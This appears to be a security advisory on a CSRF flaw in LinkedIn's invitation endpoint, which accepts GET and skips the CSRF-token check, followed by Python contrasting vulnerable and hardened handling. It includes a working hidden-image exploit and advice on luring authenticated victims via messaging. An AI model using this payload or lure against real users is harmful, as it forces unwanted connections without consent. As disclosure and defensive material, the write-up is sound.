Next, we show a typical request to the "Send Invitation" functionality:
POST /fetch/manual-invite-create HTTP/1.1
Host: www.linkedin.com
...
emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn&csrfToken=ajax:1234567890123456789&sourceAlias=0_cB6j7zv7bfEcbTWXQyKwqELvCi7FWQRq-jJsq2WDImH
Some parameters are neither used nor validated by the application, so they can be removed from the request without changing its effect:
- csrfToken
- sourceAlias
Also, the HTTP GET method can be used instead of the POST method of the original request. This makes the CSRF vulnerability easier to exploit, because a GET can be triggered from a plain <img> tag without any scripting. The following request therefore produces the same result as the original POST request:
GET /fetch/manual-invite-create?emailAddresses=<email>&subject=Invitation+to+connect+on+LinkedIn
1. The attacker creates a web page "csrf-exploit.html" that issues an HTTP GET request to the "Send Invitation" functionality.
For example:
...
<img src="http://www.linkedin.com/fetch/manual-invite-create?emailAddresses=<attacker_email>&subject=" width=0 height=0>
...
2. A user authenticated to LinkedIn visits the "csrf-exploit.html" page controlled by the attacker.
For example, the attacker sends a message to the victim (LinkedIn's own messaging system is preferable, as it ensures the victim is authenticated while reading it) and, using social engineering, persuades the victim to visit the page. The victim's browser then requests the hidden image and attaches the victim's LinkedIn session cookies to that request.
3. The attacker receives a connection invitation from the victim, accepts it, and the victim is added to the attacker's connections/contacts.
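The two root causes above (the csrfToken parameter is never checked, and a state-changing action is accepted over GET) can be shown side by side in code. The following Python is an added illustration written for this write-up, not LinkedIn's server code: vulnerable_accepts() models the behaviour described above, hardened_accepts() adds the checks whose absence makes the exploit work, and the token, origin and e-mail values are constructed placeholders. The exploit GET from csrf-exploit.html passes the first function and is rejected by the second.

```python
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed sample values (not taken from any real session or account).
SESSION_CSRF_TOKEN = "ajax:1234567890123456789"   # token bound to the victim's session
SITE_ORIGIN = "https://www.linkedin.com"
ENDPOINT = "/fetch/manual-invite-create"

# The request the hidden <img> on csrf-exploit.html makes the victim's browser send.
EXPLOIT_GET_URL = ENDPOINT + "?emailAddresses=attacker%40example.com&subject="

# A legitimate request as the site's own "Send Invitation" form would send it.
LEGIT_POST_BODY = ("emailAddresses=friend%40example.com"
                   "&subject=Invitation+to+connect+on+LinkedIn"
                   "&csrfToken=" + SESSION_CSRF_TOKEN)


def _single(params):
    """parse_qs returns lists; keep the first value of each parameter."""
    return {k: v[0] for k, v in params.items()}


def vulnerable_accepts(method, url, body=""):
    """Model of the behaviour described above: GET and POST both work, csrfToken
    and sourceAlias are never checked, only emailAddresses has to be present."""
    params = _single(parse_qs(urlsplit(url).query))
    if method == "POST":
        params.update(_single(parse_qs(body)))
    return "emailAddresses" in params


def hardened_accepts(method, url, body="", headers=None,
                     session_token=SESSION_CSRF_TOKEN):
    """Same endpoint with the checks whose absence enables the CSRF:
    1. state changes only over POST, so an <img> (always a GET) cannot trigger it;
    2. csrfToken must be sent in the POST body and match the token bound to the
       session, compared in constant time; parameters in the URL are ignored;
    3. if the browser sent an Origin header it must be our own origin
       (defence in depth: a cross-site request never carries our origin)."""
    headers = headers or {}
    if method != "POST":
        return False
    params = _single(parse_qs(body))
    if not hmac.compare_digest(params.get("csrfToken", ""), session_token):
        return False
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    return "emailAddresses" in params


if __name__ == "__main__":
    print("vulnerable, exploit GET:", vulnerable_accepts("GET", EXPLOIT_GET_URL))
    print("hardened,   exploit GET:", hardened_accepts("GET", EXPLOIT_GET_URL))
    print("hardened,   legit POST :", hardened_accepts("POST", ENDPOINT, LEGIT_POST_BODY,
                                                       {"Origin": SITE_ORIGIN}))
```

Note that the method check alone is not enough: an attacker page can auto-submit a hidden cross-site POST form, which is why the token comparison (and the Origin check as a second layer) is what actually closes the hole.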
